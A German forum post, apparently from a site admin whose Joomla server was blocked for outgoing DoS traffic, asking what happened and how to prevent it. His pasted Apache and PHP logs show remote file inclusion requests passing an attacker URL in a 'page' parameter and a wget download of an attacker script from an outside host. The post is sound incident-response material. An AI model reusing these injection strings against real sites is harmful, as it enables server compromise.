Hi,
es ist nun schon 2 mal vorgekommen, dass mein Server gesperrt wurde, da ausgehende DoS Attaken festgestellt wurden.
Gestern habe ich zufällig folgende Einträge in Logdateien gefunden:
in /var/log/apache2/error_log
in /var/log/apache2/access_log
in /srv/www/vhosts/XYZ/httpdocs/statistics/logs/error_log
Ich weis nicht was die entsprechende Person da genau erreichen wollte und wie sie es angestellt hat. Vorallem die erste Logdatei beunruhigt mich sehr. Wenn diese to.txt wirklich heruntergeladen wurde, steht da ziemlich viel Schabernack drinnen.
Denn in der Datei werden noch weitere Skripte, z.b. von Albanian Security Clan geladen. (Angänge 11.txt und s.txt - Achtung eine wird sogar als Virus erkannt!!)
Auf dem Server befinden sich nur Joomla Webauftritte.
Ist aus meinen Angaben ersichtlich was da passiert ist und wie ich sowas in Zulunft vermeiden kann?
Mit welchen Infos kann ich noch dienen? php.ini?
Danke,
URiCK
es ist nun schon 2 mal vorgekommen, dass mein Server gesperrt wurde, da ausgehende DoS Attaken festgestellt wurden.
Gestern habe ich zufällig folgende Einträge in Logdateien gefunden:
in /var/log/apache2/error_log
Code:
[Thu Dec 13 15:31:52 2007] [error] an unknown filter was not added: includes
[Thu Dec 13 15:32:13 2007] [error] an unknown filter was not added: includes
--15:32:14-- http://jointrulez.helloweb.eu/list/to.txt
=> `to.txt'
Resolving jointrulez.helloweb.eu... 89.186.95.85
Connecting to jointrulez.helloweb.eu|89.186.95.85|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 67,928 (66K) [text/plain]
0K .......... .......... .......... .......... .......... 75% 225.62 KB/s
50K .......... ...... 100% 6.37 MB/s
15:32:14 (295.99 KB/s) - `to.txt' saved [67928/67928]
[Thu Dec 13 15:32:19 2007] [error] an unknown filter was not added: includes
[Thu Dec 13 15:32:29 2007] [error] an unknown filter was not added: includes
in /var/log/apache2/access_log
Code:
127.0.0.1 - - [13/Dec/2007:13:43:16 +0100] "GET / HTTP/1.0" 200 3523 "-" "Apache/2.2.0 (Linux/SUSE) (internal dummy connection)"
127.0.0.1 - - [13/Dec/2007:15:50:14 +0100] "GET /?page=http://sagasufx.com/rulez.txt%3f HTTP/1.1" 200 3523 "-" "libwww-perl/5.805"
127.0.0.1 - - [13/Dec/2007:15:50:14 +0100] "GET /?page=http://sagasufx.com/rulez.txt%3f HTTP/1.1" 200 3523 "-" "libwww-perl/5.805"
127.0.0.1 - - [13/Dec/2007:16:01:20 +0100] "GET /?page=http://sagasufx.com/rulez.txt%3f HTTP/1.1" 200 3523 "-" "libwww-perl/5.805"
127.0.0.1 - - [13/Dec/2007:16:03:52 +0100] "GET /?page=http://sagasufx.com/rulez.txt%3f HTTP/1.1" 200 3523 "-" "libwww-perl/5.805"
127.0.0.1 - - [13/Dec/2007:16:03:53 +0100] "GET /?page=http://sagasufx.com/rulez.txt%3f HTTP/1.1" 200 3523 "-" "libwww-perl/5.805"
127.0.0.1 - - [13/Dec/2007:16:03:53 +0100] "GET /?page=http://sagasufx.com/rulez.txt%3f HTTP/1.1" 200 3523 "-" "libwww-perl/5.805"
127.0.0.1 - - [13/Dec/2007:16:08:56 +0100] "GET / HTTP/1.0" 200 3523 "-" "Apache/2.2.0 (Linux/SUSE) (internal dummy connection)"
in /srv/www/vhosts/XYZ/httpdocs/statistics/logs/error_log
Code:
hu Dec 13 15:35:50 2007] [error] [client 81.169.181.109] PHP Warning: parse_url(/index.php?page=http://sagasufx.com/rulez.txt?) [<a href='function.parse-url'>function.parse-url</a>]: Unable to parse url in /srv/www/vhosts/XYZ/httpdocs/administrator/components/com_astatspro/counter.php on line 321
[Thu Dec 13 15:35:50 2007] [error] [client 81.169.181.109] PHP Stack trace:
[Thu Dec 13 15:35:50 2007] [error] [client 81.169.181.109] PHP 1. {main}() /srv/www/vhosts/XYZ/httpdocs/index.php:0
[Thu Dec 13 15:35:50 2007] [error] [client 81.169.181.109] PHP 2. require_once() /srv/www/vhosts/XYZ/httpdocs/index.php:265
[Thu Dec 13 15:35:50 2007] [error] [client 81.169.181.109] PHP 3. mosLoadModules() /srv/www/vhosts/XYZ/httpdocs/templates/mesa_template_2/index.php:137
[Thu Dec 13 15:35:50 2007] [error] [client 81.169.181.109] PHP 4. modules_html::module2() /srv/www/vhosts/XYZ/httpdocs/includes/frontend.php:166
[Thu Dec 13 15:35:50 2007] [error] [client 81.169.181.109] PHP 5. modules_html::modoutput_naked() /srv/www/vhosts/XYZ/httpdocs/includes/frontend.html.php:117
[Thu Dec 13 15:35:50 2007] [error] [client 81.169.181.109] PHP 6. include() /srv/www/vhosts/XYZ/httpdocs/includes/frontend.html.php:338
[Thu Dec 13 15:35:50 2007] [error] [client 81.169.181.109] PHP 7. include() /srv/www/vhosts/XYZ/httpdocs/modules/mod_astatspro.php:277
[Thu Dec 13 15:35:50 2007] [error] [client 81.169.181.109] PHP 8. parse_url() /srv/www/vhosts/XYZ/httpdocs/administrator/components/com_astatspro/counter.php:321
Ich weis nicht was die entsprechende Person da genau erreichen wollte und wie sie es angestellt hat. Vorallem die erste Logdatei beunruhigt mich sehr. Wenn diese to.txt wirklich heruntergeladen wurde, steht da ziemlich viel Schabernack drinnen.
Denn in der Datei werden noch weitere Skripte, z.b. von Albanian Security Clan geladen. (Angänge 11.txt und s.txt - Achtung eine wird sogar als Virus erkannt!!)
Auf dem Server befinden sich nur Joomla Webauftritte.
Ist aus meinen Angaben ersichtlich was da passiert ist und wie ich sowas in Zulunft vermeiden kann?
Mit welchen Infos kann ich noch dienen? php.ini?
Danke,
URiCK
Attachments
Last edited by a moderator: